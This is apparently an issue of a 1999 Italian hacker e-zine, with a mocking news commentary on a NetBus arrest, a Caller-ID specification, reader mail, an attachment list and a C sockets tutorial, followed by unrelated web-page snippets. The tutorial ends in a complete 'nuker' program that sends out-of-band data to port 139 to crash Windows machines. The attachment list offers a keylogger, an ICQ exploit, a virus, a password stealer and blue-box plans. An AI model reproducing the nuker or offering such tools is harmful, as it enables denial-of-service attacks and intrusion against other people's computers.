digitalizzate, creando >seri danni e violando la privacy dei malcapitati. Il "capolavoro", del >quale andava particolarmente fiero, era lo "scherzetto" organizzato ai >danni di un perito assicurativo: l'uomo e' trasecolato, quando sul suo >monitor e' comparsa la scritta "Il computer e' stanco". Caxxo ma come avra' mai fatto questo genio hacker??????

10 >Ingegneri, avvocati, docenti universitari e studenti, caduti nella >trappola del geometra, si sono rivolti ai carabinieri, che hanno >individuato l'hacker. Ottenuto un mandato di perquisizione, i militari >del Nucleo operativo della Compagnia hanno bussato alla porta di G. F. che ha risposto "No grazie non compro niente" hihihi >(che nel web era conosciuto col soprannome di "Harris"). Il giovane e' Mi che ppppppaura!!! Il conte Drac...ehm...Harris!!!!!!!!!!!! >stato denunciato per una sfilza di reati che vanno dall'accesso >abusivo ai sistemi informatici alla diffusione di codici segreti, >dalla sostituzione di persona alla violazione della tutela dei >programmi per elaboratori, passando per la diffusione di software in >grado di danneggiare i computer. Ma sto cax di virus cosa sara' mai???? >"Harris", spiega il tenente Saverio Spoto, comandante della Compagnia >dei carabinieri, contattava le sue vittime attraverso Icq, un area di >conversazione offerta da numerosi provider di Internet. Utilizzando Sono i provider a offrire icq? Non sono competente in materia ma non credo proprio che siano i provider... >una chiave d'accesso acquistata fornendo generalita' false, durante le >"chiacchierate scritte" G. F. inviava ai computer delle vittime il >virus Netbus, che consente di "navigare" nel disco fisso dei computer >altrui durante il collegamento a Internet. Harris aveva anche un uhhhhhhhhhhh!!!!! il famoso virus Netbus!!!!! Un vero e proprio virus!!! Certo c'era bisogno di specificare, magari uno pensava che consentisse di navigare nel disco fisso dei computer altrui finito il collegamento a Internet! A computer spento magari!!! >proprio sito, nel quale offriva foto pornografiche, programmi-pirata e >files di ogni genere: chi si collegava al suo indirizzo, veniva >immediatamente contagiato dal virus informatico. Allora non e' una stronzata il fatto che il 44% degli italiani usano Internet solo x andare su siti XXX... e che il 32% lo usa x cercare e scaricarsi software pirata... ahahahah >Ottenuto l'accesso ai computer delle persone contattate in rete, >spiega il tenente Spoto, il giovane si impadroniva dell'identificativo >e della password segreta, utilizzati dalle vittime per collegarsi alla >rete: ne aveva alcune decine. Era solo l'inizio: subito dopo, iniziava Cavolo!!! Alcune decine!!! Quanto vorrei diventare un vero hacker come lui ;) hihihihihihihihihihihihihihihihihihihihihihihihihihihihihihihihihihihi >il furto di files e foto digitali, che sparivano misteriosamente dagli >hard disk dei proprietari e finivano su quello di G. F. Che uso >intendesse farne, ancora non si sa: i carabinieri sospettano che il >pirata informatico abbia forzato anche i sistemi di uffici pubblici e >professionisti, entrando cosi' in possesso di dati estremamente >riservati. >Gli investigatori non spiegano come, ma alla fine sono riusciti a Certo che e' difficile leggere un ip in qualke log file, andare dalla tin e dire "Scusi chi e' questo x.x.x.x???" Ricordatevi che nella polizia ci sono solo ex-smanettoni o ex-hacker che cosa credevate ;))))))))))))) >identificare il geometra, che ora rischia una condanna fra uno e >cinque anni di carcere. Dal comandante della Compagnia, partono ora Da uno a cinque anni...se ti prendono a usare bo netbus e altri 10 trojan che ti danno 60 anni di carcere?

11 >due appelli: I frequentatori dell'icq farebbero bene a fare una >scansione del disco fisso, con un antivirus aggiornato. Chi ha avuto >contatti con Harris, se ha il dubbio che i suoi archivi siano stati >forzati, venga a trovarci al Comando. L'indirizzo, stavolta non >telematico, e' via Nuoro 9 Cagliari. > LUIGI ALMIENTO Per questo numero e' tutto questo art vi e' stato segnalato da me cioe' io che sono il mitico (non molto in verita') Spero che ognuno di voi possa capire se quello che e' stato preso era un hacker o un lamer...cmq a voi l'ardua scelta... e speriamo che queste parole non siano buttate al vento come foglie d'autunno... ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ Mailzz viva i lettori: ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ º º³ L'ANGOLO DELLA POSTA ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ From: (Jeff Sicherman) Subject: Caller-ID Specifications This is a copy of the data sheet picked up at the Rockwell booth at the COMDEX show. INTRODUCTION Calling Number Delivery (CND), better known as Caller ID, is a telephone service intended for residential and small business customers. It allows the called Customer Premises Equipment (CPE) to receive a calling party's directory number and the date and time of the call during the first four second silent interval in the ringing cycle. The customer must contact a Bellcore Client Company to initiate CND service. According to Pacific Bell representatives, the following states and district currently support CND service: Delaware, District of Columbia, Florida, Georgia, Idaho, Kentucky, Louisiana, Maine, Maryland, Nebraska, Nevada, New Jersey, Oklahoma, Tennessee, Vermont, Virginia, and West Virginia. The following states are scheduled to support CND service by April, 1992: Alaska, Arizona, California, Colorado, Illinois, Indiana, Iowa, Massachusetts, Mississippi, New Hampshire, New York, North Carolina, North Dakota, Ohio, Oregon, Rhode Island, and South Carolina. PARAMETERS The data signalling interface has the following characteristics: Link Type: 2-wire, simplex Transmission Scheme: Analog, phase-coherent FSK Logical 1 (mark) /- 12 Hz Logical 0 (space) /- 22 Hz Transmission Rate: 1200 bps Transmission Level: /- dbm into 900 ohm load (I have copied this data as presented. I believe the transmission level is meant to be dbm.) PROTOCOL The protocol uses 8-bit data words (bytes), each bounded by a start bit and a stop bit. The CND message uses the Single Data Message format shown below.

12 Channel Carrier Message Message Data Seizure Signal Type Length Word(s) Word Signal Word Word Checksum CHANNEL SEIZURE SIGNAL The channel seizure is 30 continuous bytes of 55h ( ) providing a detectable alternating function to the CPE (i.e. the modem data pump). CARRIER SIGNAL The carrier signal consists of 130 +/- 25 ms of mark (1200 Hz) to condition the receiver for data. MESSAGE TYPE WORD The message type word indicates the service and capability associated with the data message. The message type word for CND is 04h ( ). MESSAGE LENGTH WORD The message length word specifies the total number of data words to follow. DATA WORDS The data words are encoded in ASCII and represent the following information: o The first two words represent the month o The next two words represent the day of the month o The next two words represent the hour in local military time o The next two words represent the minute after the hour o The calling party's directory number is represented by the remaining words in the data word field If the calling party's directory number is not available to the terminating central office, the data word field contains an ASCII "O". If the calling party invokes the privacy capability, the data word field contains an ASCII "P". CHECKSUM WORD The Checksum Word contains the twos complement of the modulo 256 sum of the other words in the data message (i.e., message type, message length, and data words). The receiving equipment may calculate the modulo 256 sum of the received words and add this sum to the reveived checksum word. A result of zero generally indicates that the message was correctly received. Message retransmission is not supported. EXAMPLE CND SINGLE DATA MESSAGE An example of a received CND message, beginning with the message type word, follows: h= Calling number delivery information code (message type word) 12h= 18 decimal; Number of data words (date,time, and directory number words) ASCII 30,39= 09; September ASCII 33,30= 30; 30th day ASCII 31,32= 12; 12:00 PM ASCII 32,34= 24; 24 minutes (i.e., 12:24 PM) ASCII 36,30,39,35,35,35,31,32,31,32= (609) ; calling party's directory number 51h= Checksum Word

13 DATA ACCESS ARRANGEMENT (DAA) REQUIREMENTS To receive CND information, the modem monitors the phone line between the first and second ring bursts without causing the DAA to go off hook in the conventional sense, which would inhibit the transmission of CND by the local central office. A simple modification to an existing DAA circuit easily accomplishes the task. (I will mail the Rockwell data sheet, which includes the suggested schematic diagram.) MODEM REQUIREMENTS Although the data signalling interface parameters match those of a Bell 202 modem, the receiving CPE need not be a Bell 202 modem. A V bps modem receiver may be used to demodulate the Bell 202 signal. The ring indicate bit (RI) may be used on a modem to indicate when to monitor the phone line for CND information. After the RI bit sets, indicating the first ring burst, the host waits for the RI bit to reset. The host then configures the modem to monitor the phone line for CND information. (I'm skipping some Rockwell-specific information here.) According to Bellcore specifications, CND signalling starts as early as 300 ms after the first ring burst and ends at least 475 ms before the second ring burst. APPLICATIONS Modem manufacturers will soon be implementing new modem features based on CND information as this service becomes widely available. Once CND information is received the user may process the information in a number of ways. 1. The date, time, and calling party's directory number can be displayed. 2. Using a look-up table, the calling party's directory number can be correlated with his or her name and the name displayed. 3. CND information can also be used in additional ways such as for: a. Bulletin board applications b. Black-listing applications c. Keeping logs of system user calls, or d. Implementing a telemarketing data base REFERENCES For more information on Calling Number Delivery (CND), refer to Bellcore publications TR-TSY and TR-TSY To obtain Bellcore documents contact: Bellcore Customer Service 60 New England Avenue, Room 1B252 Piscataway, NJ (201) Ciao Zero Cool, com'e' Praga? E le ceche??eh!eh! Cmq ti volevo dire che avrei scritto una articoletto su 3 semplici backdoors (aggiungere un user,manipolare.rhosts e inetd.conf per crearsi una porta.. cose che saprai a memoria) e mi chiedevo se le potevo mettere su Newbies nø2. Se non posso dimmelo pure che non mi offendo! Poi ti volevo chiedere qualche informazione su come e' strutturata la crew, chi sono i piu' bravi ecc.

14 Byez, Hamelin Re: si il tuo articolo e' ben accetto scusa se lo scrivo qua ed ora ma non trovo la tua mail proprio + e il txt con su scritto cio'e'l' unica cosa che mi e'rimasta fatti sentire ZeroCool Re: l'art di Hamelin e' presente su questo numero :))) alla fine ci ha ribeccati lui eheheheh N0bodY Ciao zero, ascolta, Ho un amico che fa il sistemista ed e'in grado di controllare il traffico delle linee telefoniche! Se io gli do dei numeri verdi e lui scopre che ci si collega sempre un sacco di gente, significa che il GREEN e' piuttosto sicuro oppure il contrario? Andrew Coleman Re: si mi farebbe piacere ricevere solo dei manuali e dei txt sulle linee telefoniche per quanto riguarda i green non ne voglio proprio sapere ZeroCool Vorrei esprimere la mia ammirazione verso il vostro fantastico gruppo Vai ragazzi siete i migliori Coda RE: stragrazie millexxxxx ZeroCool RE: oddio questo chissa' che si e' bevuto prima di sedersi davanti al computer..o avra' fumato??? hihihi tnx cmq ricorda che e' un lavoro di squadra nonostante ci siamo io e zero (e dal prox num nosferatu) come "capi", noi siamo solo dei coordinatori e questa e-zine e' bella imo xche' non e' mia o tua e' un po' di tutti ognuno la sente propria e x questo vuole miglio rarla dando il meglio di se' coi propri articoli N0bodY ciao zerocool sono un ragazzo che ne vuole sapere un pacco ma che, come te, capisce poco l'inglese. navigando ho trovato molti siti sull'hacking ma il piu' chiaro e' sicuramente il vostro perche' e' in italiano e spiega testualmente na frega (molte) di cose. un po sto a lecca': non sono uno che ottiene le cose leccando il culo su irc ma, visto che sembri molto disponibile, ti chiedo una cosa proprio da + lamer che non si puo': -cos'e' un volmetro? (non so manco se e' software o hardware) per ora mi interesso dei green perche' appena ne trovero' uno potro dedicarmi alla navigazione serrata per trovare strafigherie. una cosa tra amici: una volta che c'ho il green che cazzo devo scriverci nella user e password?????????? se mi rispondi sei un grande mo vengo sui vostri chan IRC ciao:):) RE: ciao grazie per i complimenti [ps ho un'inglesina che mi sta dando lezioni di lingua e penso di poter avere un livello accettabile ] ; per quanto riguarda un volmetro che so' io e' a livello hardware e per quanto riguarda i green se vuoi un consiglio lasciali perdere o rischi di fare una brutta fine ZeroCool PS DI N0bodY88 = cosa intendevi zero con la frase "Ho un inglesina che mi sta dando lezioni di lingua"??? Ahhh io e i miei doppisensi... hihihi

15 Ola...ho visto il tuo indirizzo sulla pagina web e visto che non so a chi rivolgermi spero in un tuo aiuto... Questo e' il problema: voglio lanciare Boclient (quello per Dos) su un pc di un boservizato da una shell dos, in modo che i comandi indirizzati ad un secondo boservizato partano da quel PC e non dal proprio... il mio problema e' che non riesco a far eseguire boclient al primo pc.. Questa e' la procedura che seguo: 1-Appadd command.com 23 2-apro telenet 3-lancio boclient.exe (devo mettere qualche parametro?) e mi si inchioda qui Telnet...ma se faccio un process list vedo il processo attivo... Ho provato a lanciare direttamente anche Appadd c:\boclient.exe 23 ma quando apro telent sulla porta 23 non risponde niente ;-( Che devo fare?...ma si puo fare una cosa del genere? Ho fatto mille prove...ma il risultato e' sempre quello ;-( byez Snafuz RE: Ciao in questo numero dell'ezines ci dovrebbe essere la risposta per la tua domanda "ah na cosa sapete che esiste un sito in internet con tutti i numeri verdi esitenti italiani [nooo] e anche quelli non doumentati nelle guide [nooooo] si, bhe ma ci vuole un caro account se qualcuno e' disposto ad aiutarmi nel trovarlo mi contatti ah gia' il sito in questione si chiama ciao a tutti ZeroCool" Che sappia io non ci sono quelli non documentati nelle guide...sorry. Blum RE: Mha a me han detto cosi'cmq magari sbaglio cmq e'un argomento che non mi interessa piu'cmq colgo l'occasione per salutarti sei miticissimo ZeroCool Ciao Sono Uncle Jack, vi sto seguendo su ahccc da due mesi circa ed esco dall ombra per due motivi: Innanzi tutto complimenti per il primo numero dell' E-ZINE L'ho scaricato stampato e letto nel giro di una sera!!!! Spero che le uscite continuino anche se penso che non sia un lavoro da poco mettere insieme un lavoro di quelle dimensioni. Comunque sono in attesa del secondo numero ;-)) Secondo ho letto il post di Newbie 1,1 riguardo il futuro di ahccc e condivido il pensiero che negli ultimi periodi e' scaduto parecchio di qualita', io mi sono ridotto a leggere solo i post di alcuni di voi lasciando perdere il resto. Trovo quindi FANTASTICA l' idea della mailing list e siccome sul Vs. sito la pagina e' in costruzione...e non e' meglio specificato a chi rivolgersi, chiedo a voi ma e' come se lo chidessi a tutto il gruppo se per cortesia mi voleste inserire nella lista consentendomi di continuare a seguire i post di gente che ha contribuito a risvegliare la mia curiosita di studiare ed imparare (NB. ho 32 anni e il mio primo login risale all aprile 1992 poi per motivi di lavoro e famiglia ho dovuto mollare ho ripreso grazie a voi). Nella speranza di poter sedere alla vostra tavola per poter appagare la mia sete di sapere vi saluto. RE: Non ho parole sei strabenvenuto da noi e la mailing list e' gia'attiva ZeroCool

16 hi ZeroCool, volevo avvertirti che nel tuo sito non ci sono i "testi tradotti", potresti mandarmi i testi via o darmi un indirizzo dove possa trovare questi testi? RE: Il nostro traduttore ufficiale si sta dando da fare al riguardo ZeroCool RE: Tutti le traduzioni sono sempre state messe nelle e-zine fino adesso, ma appena rifacciamo il sito faremo la page traduzioni N0bodY scusa, ti volevo anche chiedere se potevo pubblicare la vostra rivista sul mio sito, come.to/lopks con la "rivista" della precedente mail intendevo dire la e-zine di ZeroCool e N0bodY88... by lopks RE: certo te la mandero'al + presto. ZeroCool ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ º º³ RIEPILOGO LINK IN ORDINE ALFABETICO ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ [ D.I.B > ] [ NetRunners > ] [ NewBies > ] [ RingZ3rO > ] [ Softpj > ] [ Spaghetti Phreakers > ] [ Spippolatori > ] [ Vana - Imago > ] ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ² ÛÛ ÛÛ ÛÛÛÛ ÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛÛÛÛ Û ² ² ÛÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛÛ ÛÛÛ ² ² ÛÛ²ÛÛ ÛÛ ÛÛ ÛÛÛÛ ÛÛ ÛÛÛÛ ÛÛ²ÛÛ ÛÛÛ ÛÛÛ ² ² ÛÛÛÛÛÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛÛÛÛÛÛ ÛÛÛ ÛÛÛ ² ² ÛÛ ÛÛ ÛÛÛÛÛ ÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛÛÛÛ ÛÛ ÛÛ ÛÛÛ ÛÛÛ ² ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ 2 PAROLE SUGLI ALLEGATI: - anti-s.zip = file con altri 5 doc presi dalla mitica guida fatta da Anti-Social. - AntiMelissa = questa e' una voce di registro che se aggiunta al ns registry ci rende non attaccabili dal tanto decantato melissa.tnx Sephy - cmanager.exe = programmino usato in alcuni netcafe e del quale unlt ci ha fatto lieto dono :))), trovate una descrizione del prog nella sezione "hacking e altro" dove ulnt spiega tutto quello che sa sui netcafe :-))))))) - CookBook = zip con il (speriamo diventi) famoso CookBook di ElectroRipper in anteprima x NewBies da uno dei + attivi degli scrittori della ns e-zine. - file3ds.zerocool = file 3ds attinente all'articolo in cui ZeroCool parla di programmazione di demo x nintendo Guida di Kalidor all'hacking per Win95-98.zip = file contenente la guida fatta dal mitico Kalidor. - IcqExploit.htm = questo e' un file fatto da Sephy il cui uso e' spiegato nel suo articolo intitolato ICQ EXPLOIT.

17 - italiano.lng = Traduce netbus 2 dall'inglese all'italiano... inseritelo nella dir LANG e fate opzioni nel menu di netbus...by Sephy - KeyLogger.zip = come capirete dal nome (ma no!) questa e' un keylogger (ma va!) che Sephy ci spiega ad usare in uno dei suo articoli, e cmq trovate la documentazione all'interno se avete fretta di usarlo. - naggabox.zip e omega.zip = file in cui sono riportati gli schemi di una blue box che nonstante se ne dica secondo me funziona ankoroggi qui in italia ;-) - NetBusEliminator = utile programmino fatto dal ns Quequero che praticamente va a modificare le proprieta' del server di NetBus cosicche' se siete infetti vedrete il server caricarsi al riavvio del pc senza che lo stesso sia + nascosto, individuandone quindi anke il nome. Un tnx 1000 a Quequero da parte di tutti noi. - NetbusICO.zip = alcune icone da usare secondo quanto spiegato da Sephy in uno dei suo articoli (ma quanti ne ha fatti sto qua??? hihihi) - newbies.asm = virus fatto da Caos83 e provato nella sua scuola, se avete un po' di cultura di so e hacking installatevelo e provate a rispondere alle domande che vi verranno poste ;-) - r0_pesentry.zip = file zip che e' collegato all'articolo di Kill3xx (dei Ring0...i migliori!) - rain10.zip = file accluso xche' chiamato in causa da SoftWord x il suo articolo sull'overclock; - SourceCode.zip = file contenenti info e codice che ipley ha spiegato (si proprio l'articolo dove si spiega come fare una backdoor!) - supporti.zip = file allegato con i sorgenti, l'exe e molti.pas moooooooolto interessanti dei quali Master parla nel suo articolo ^ ^ - zerocool.zip = file contenente una serie di exploits forntici dal ns mitico redattore, un prog x leggere le pass del prog CuteFtp e un paio di immagini da luis elezionate eheheh. N0bodY88 PS DELL'ULTIMO MINUTO:dato che non so quanti di voi hanno voglia di scaricarsi una e-zine di un 1 mega e mezzo, abbiamo deciso di dividere la e-zine in 2 zip, 1 contenente questa e-zine e altri articoli o guide, mentre nell'altro trovate i prog che son sopra elencati, ma questo non vuol dire che non dovete scarcarli entrambi :PPP N0bodY88 ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ² ÛÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛ ÛÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛ ÛÛÛÛÛÛ ÛÛ ÛÛ ² ² ÛÛÛ ÛÛ ÛÛÛ ÛÛ²²²²ÛÛ ÛÛ²²ÛÛ ÛÛÛ ÛÛ ² ² ÛÛÛ ÛÛ ÛÛ ÛÛÛ ÛÛ²²²²ÛÛ ÛÛÛÛ ÛÛ ÛÛ²ÛÛ ÛÛ ² ² ÛÛÛ ÛÛ ÛÛ ÛÛÛ ÛÛ²²²²ÛÛ ÛÛ ÛÛ ÛÛ ÛÛÛÛÛÛÛ ÛÛ ² ² ÛÛÛ ÛÛÛÛÛÛÛ ÛÛÛ ÛÛÛÛÛÛÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛÛÛÛÛ ² ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ³ ::::::::::::::::::::::::::: ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵ ³ Titolo: Corso di C - III Parte³ ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵ ³ di : ElectroRipper ³ ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵ ³ Scritto il : 21/4/99 ³ ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵ ³ Pericolo: Û ³ ÔÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ;

18 E L E C T R O R I P P E R P R E S E N T A C O R S O D I C I I I P U N T A T A Stavolta parliamo dei...socket! Oramai dovreste avere un'idea generale del linguaggio e di come programmare in C, semplici applicazioni, dopo aver letto le prime due puntate di questo corso, riguardanti la prima la sintassi di base, e la seconda la gestione dei files, quindi stavolta tratteremo un argomento un po' piu' specifico. Dato che e' un argomento lunghetto lo divideremo in due puntate. Un socket altro non e' che un cazzariello che gestisce per noi le parti piu' a basso livello di una connessione, lasciandoci cosi' liberi di pensare al programma e risparmiandoci un casino di fatica. Faro' riferimento a Unix e Linux ma in Windows non dovrebbe cambiare molto. Ecco gli headers che dovrete includere nei vostri programmi per il supporto dei socket di base : sys/socket.h sys/types.h netinet/in.h netdb.h Per Windows95 la libreria che si occupa della gestione dei socket e' wsock32.dll Un socket viene riconosciuto dal C per il suo descriptor. Proprio come un file infatti un socket ha un numero intero che lo identifica, e glielo assegniamo con la funzione socket, che usa la seguente sintassi : int socket(int domain, int type, int protocol); Ecco le costanti piu' comuni da passare come domain : AF_UNIX (protocolli interni Unix) AF_INET (protocolli internet ARPA) AF_ISO (protocolli ISO) Come type potete usare invece : SOCK_STREAM (TCP) SOCK_DGRAM (UDP) SOCK_RAW (Il programma stesso costruisce i pacchetti) Come protocol potete passare 0 in modo che scelga automaticamente quello + adatto. L'int restituito sara' appunto il descriptor del socket che abbiamo appena creato. Poi dobbiamo comunicare al socket a quale indirizzo collegarsi e su quale porta e per farlo utilizziamo la struttura sockaddr, o meglio la struttura sockaddr_in con un cast. struct sockaddr_in{ short sin_family; short sin_port; struct in_addr sin_addr } sin_addr e' una struttura di tipo in_addr, cioe'...

19 struct in_addr{ long s_addr; } In sin_family potete schiaffarci AF_INET, sin_port e' la porta, e sin_addr e'...indovinate un po'... esatto, l'indirizzo del server. Internet usa valori ordinati nel modo inverso a quello dei processori intel, (i cosiddetti host byte order e network byte order) quindi per inserire un valore in sin_port o sin_addr dovremo prima convertirlo, e possiamo farlo con queste funzioni : unsigned long int htonl(unsigned long int hostlong); unsigned short int htons(unsigned short int hostshort); unsigned long int ntohl(unsigned long int netlong); unsigned short int ntohs(unsigned short int netshort); il cui significato mi sembra abbastanza ovvio (se non dovesse esserlo vi bastera' scrivere "man htonl" per avere una descrizione piu' dettagliata) In sin_addr non va inserito ovviamente l'indirizzo alfanumerico, ma l'ip numerico. Per trovare l'ip numerico di uno alfanumerico usiamo la funzione : struct hostent *gethostbyname(char *name); name e' la stringa che rappresenta l'indirizzo alfanumerico. La funzione restituisce un puntatore a una struttura hostent. L'ip che ci interessa e' contenuto nella struttura puntata dal valore di ritorno di gethostbyname, nel campo char *h_addr. Una volta che abbiamo creato il socket dobbiamo connetterlo, e lo possiamo fare con la funzione : int connect(int sockfd, struct sockaddr *serv_addr, int addrlen ); sockfd e' il descriptor del socket (valore di ritorno della funzione socket) serv_addr e' la struttura sockaddr che contiene l'indirizzo e la porta, addrlen e' la dimensione di serv_addr Il valore di ritorno e' 0 in caso di successo. Per scrivere ad un socket (spedire dati quindi) si puo' usare la funzione write : int write (int sockfd, char *buffer, int buflen); sockfd e' il descriptor del socket buffer punta al primo carattere della stringa da inviare buflen e' il numero di bytes da scrivere. Per leggere invece (ricevere dati quindi) si usa la stessa sintassi, ma con la funzione read ( int read (int sockfd, char *buffer, int buflen); ), solo che stavolta buffer punta al primo byte della memoria dove si vogliono salvare i dati letti, e buflen sono i caratteri da leggere. Queste due funzioni si basavano sul fatto che il socket e' rappresentato fondalmente come un intero, quindi possiamo usare il suo descriptor come se fosse un file. Ci sono pero' due funzioni che fanno la stessa cosa, ma che sono specifiche per i socket : int recv(int s, void *buf, int len, unsigned int flags);

20 int send(int s, const void *msg, int len, unsigned int flags); vabbe' s e' il descriptor, ecc. ecc. I flag li potete settare a zero oppure potete usare le seguenti costanti : MSG_OOB (out of band) MSG_DONTROUTE Alla fine quando dobbiamo chiudere il socket usiamo shutdown(int socket, int mode); dove mode e' un valore da 0 a 2 (0 chiude le operazioni di scrittura ma continua a ricevere, 1 continua solo a trasmettere, 2 viene chiuso del tutto) E poi per liberare le risorse utilizzate dal socket: closesocket (int socket); E adesso che vi sarete rotti il cazzo finalmente un esempio! Un semplice nuker. #include <stdio.h> #include <string.h> #include <netdb.h> #include <netinet/in.h> #include <sys/types.h> #include <sys/socket.h> #include <unistd.h> #define porta 139 // La classica vittima del nuke main(int argc, char *argv[]){ char *stringa = "sampei"; struct sockaddr_in indirizzo; struct hostent *hp; int socchett; socchett = socket (PF_INET, SOCK_STREAM, 0); // Crea il socket hp = gethostbyname(argv[1]); // Trova l'ip numerico bzero((char *)&indirizzo,sizeof(indirizzo));// Riempie di 0 la strutt. bcopy(hp->h_addr, (char *)&indirizzo.sin_addr, hp->h_length); // Il segno -> indica il membro della struttura puntata. Ad esempio // se ho una struttura di nome computer,con un campo chiamato CPU, // e un puntatore alla struttura (*computer) chiamato computerp, e' // la stessa cosa fare "computer.cpu = 486" o "computerp->cpu = 486" indirizzo.sin_family = AF_INET; indirizzo.sin_port = htons(porta); connect(socchett,(struct sockaddr *)&indirizzo,sizeof(indirizzo)); // Dato che abbiamo riempito una struttura di tipo sockaddr_in ma // connect richiede una di tipo sockaddr, allora utilizziamo un cast send (socchett, stringa, strlen(stringa), MSG_OOB); // Mandiamo una stringa out of band sulla 139 per nukkare close(socchett); } Il programma prende l'indirizzo alfanumerico passatogli sulla riga di comando trova l'ip numerico e invia una stringa OOB sulla 139.

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ @-, ì'ì,., ì'ì,., ì'ì,., ì'ì,., ì'ì,-@ \ )(_) -+- \ / _ \ \ /\ / / _ \ / _ Y -+- : \ /\ V V / _) \ : _ \_ \ \_/\_/ / _ \ / @-, ì'ì,., ì'ì,., ì'ì,., ì'ì,., ì'ì,-@ NEW BIES (num 3) (data 07/05/99) [ powered

Dettagli

- 1 reference coded [3,14% Coverage]

<Documents\bo_min_11_M_16_ita_stu> - 1 reference coded [3,14% Coverage] - 1 reference coded [3,14% Coverage] Reference 1-3,14% Coverage quindi ti informi sulle cose che ti interessano? sì, sui blog dei miei amici ah, i tuoi amici hanno dei

Dettagli

Socket. Nei sistemi operativi moderni i servizi disponibili in rete si basano principalmente sul modello client/server.

Socket. Nei sistemi operativi moderni i servizi disponibili in rete si basano principalmente sul modello client/server. Socket Nei sistemi operativi moderni i servizi disponibili in rete si basano principalmente sul modello client/server. Tale architettura consente ai sistemi di condividere risorse e cooperare per il raggiungimento

Dettagli

Scrivere un fake mailer in Visual Basic. La parte della guida di Lord Shinva sulle Fake Mail

